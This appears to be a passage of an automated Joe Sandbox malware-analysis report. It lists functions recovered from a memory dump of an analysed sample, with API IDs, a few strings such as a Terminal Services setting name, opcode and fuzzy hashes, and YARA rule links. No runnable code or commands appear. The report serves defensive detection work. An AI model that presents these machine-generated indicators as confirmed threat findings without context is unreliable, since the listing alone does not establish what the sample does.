                                                                                                                                                                                                                                Function 1F245B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: Wow64 Emulation Layer
                                                                                                                                                                                                                                • API String ID: 3446177414-921169906
                                                                                                                                                                                                                                • Opcode ID: 2758c9c09250ffa79a2f9b6e6ee6630d1eb3e1f5edb5b225e6d84e71e4a3541e
                                                                                                                                                                                                                                • Instruction ID: 12eb0e320aeb95984cb4c4dea67125f8ac406872f42e2d38e4dc8397c4e6660d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2758c9c09250ffa79a2f9b6e6ee6630d1eb3e1f5edb5b225e6d84e71e4a3541e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5221297660061DBFEB059AA0CD88DFF7B7DEF85299B140454FA02A2100E634AE21EB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1EEE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b4c57ec0a492ddfa09929326664fb12b8133735cf926d79d95e78651177afc85
                                                                                                                                                                                                                                • Instruction ID: 073944ac7f586b5bddde9f7c63751b0174f1e96799c424a43d323a353e9735fc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4c57ec0a492ddfa09929326664fb12b8133735cf926d79d95e78651177afc85
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE10475E00B49CFCB26CFA9C984A8DBBF5FF48310F21452AE856AB661D771A851CF10
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F23EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 241458380643ea3d84ee5e0c384d7484920cd5236076e528a88ebf9cd850fbc0
                                                                                                                                                                                                                                • Instruction ID: fb6ef28cc90055217d89dcf72849a316567ceb9b2b269d600cba6b650f44bff1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 241458380643ea3d84ee5e0c384d7484920cd5236076e528a88ebf9cd850fbc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F7124B1E116299FDF04CFA4D884BDDBBB9FF48315F14402AD906EB250E734A94ACB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F29A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: 7705ccfce6a7ebf3b225fc93a6659aa126ccfadc3beee2b4082dceeba4f08a5e
                                                                                                                                                                                                                                • Instruction ID: 6381441fd1c0230be4db03dddf64bcf9d0957ea533f23e6ddeb126e29b782102
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7705ccfce6a7ebf3b225fc93a6659aa126ccfadc3beee2b4082dceeba4f08a5e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94513735721A239FDF08CE28C8A5A59B7E5FB89310B21416DD906DB720EB71BC51CF80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F23EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                                                                                                                • Opcode ID: e7039538a340540efd608e6893f5ae5630a6aa290a1ee5013416d6f3e79b0db5
                                                                                                                                                                                                                                • Instruction ID: 2929434680d727cb2739215692afa49b88b55ea7487e20543e8d7af7717db1d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7039538a340540efd608e6893f5ae5630a6aa290a1ee5013416d6f3e79b0db5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C65155B2E002199FDF08CF99D844ADDBBB5FF48321F10812AE815BB250E775A909CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1F7A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4281723722-0
                                                                                                                                                                                                                                • Opcode ID: 1efcd54ef420af83f9c5027f67f2ca82bd80763ecefe1f9bb5b3eea02c0c05b5
                                                                                                                                                                                                                                • Instruction ID: 0f06bab5a268da24e96d4b3c3f937b46def17444eac30ebd8857d06b4f89f9fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1efcd54ef420af83f9c5027f67f2ca82bd80763ecefe1f9bb5b3eea02c0c05b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C3126B9E11629DFCF15DFA8D888A9DBBF0FB48320F10416AE811BB690DB356910CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1C58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                • Opcode ID: 0ac80194373bbeda2c911a07859342630b2e7b35785379602e6ce702eb6bb2a5
                                                                                                                                                                                                                                • Instruction ID: 3cd11b01f3fcb3f4999f7628793d7383c8ec20962ba9e8395bf0a766f6d20dc2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ac80194373bbeda2c911a07859342630b2e7b35785379602e6ce702eb6bb2a5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C326570D0036ADFDB25CF64C984BDABBB1BF58304F0041E9D449AB241EBB5AA94DF91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1F4B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 0$Flst
                                                                                                                                                                                                                                • API String ID: 0-758220159
                                                                                                                                                                                                                                • Opcode ID: 7671b746e9a3d7cabad5162f6d8287a4dd44e40ca0ff09c8353110bb32f0bd2a
                                                                                                                                                                                                                                • Instruction ID: fcd3f4336cb28448ed19d9291d599313c38f22fb2ce35328332dbc431d6ffc0c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7671b746e9a3d7cabad5162f6d8287a4dd44e40ca0ff09c8353110bb32f0bd2a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451A9B1E0028A8FDB24CF95C584799FBF4EF44715F25C12AD0499F240E7B0AA99CB80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1C0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • kLsE, xrefs: 1F1C05FE
                                                                                                                                                                                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1F1C0586
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                                                                                                • API String ID: 3446177414-2547482624
                                                                                                                                                                                                                                • Opcode ID: 0ef473353744a8b36748855af769ccf957bc1985c63015c9d9ae5ecd764f7974
                                                                                                                                                                                                                                • Instruction ID: be6462420e1e319fa35e8819defea885747b596d4dfed9e483a62af6b76893c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ef473353744a8b36748855af769ccf957bc1985c63015c9d9ae5ecd764f7974
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A051AAB1A00B469FCB20DFA4C4846EBB7E8AF66300F10853ED59AC7640E735B514CFA1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 1F1BDF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                                                                • String ID: 0$0
                                                                                                                                                                                                                                • API String ID: 3446177414-203156872
                                                                                                                                                                                                                                • Opcode ID: 0f3fc2d5974fbf07f47c59edf53e86cbbc4521df08064cf135b730519a55d416
                                                                                                                                                                                                                                • Instruction ID: da149c6afc14319244695f511b29ee5010450a3b53ff37629c3e18789a7472d9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f3fc2d5974fbf07f47c59edf53e86cbbc4521df08064cf135b730519a55d416
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34417EB1A08742DFC304CF28C594A5ABBE4FB88314F04466EF988DB300D771EA16CB86
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%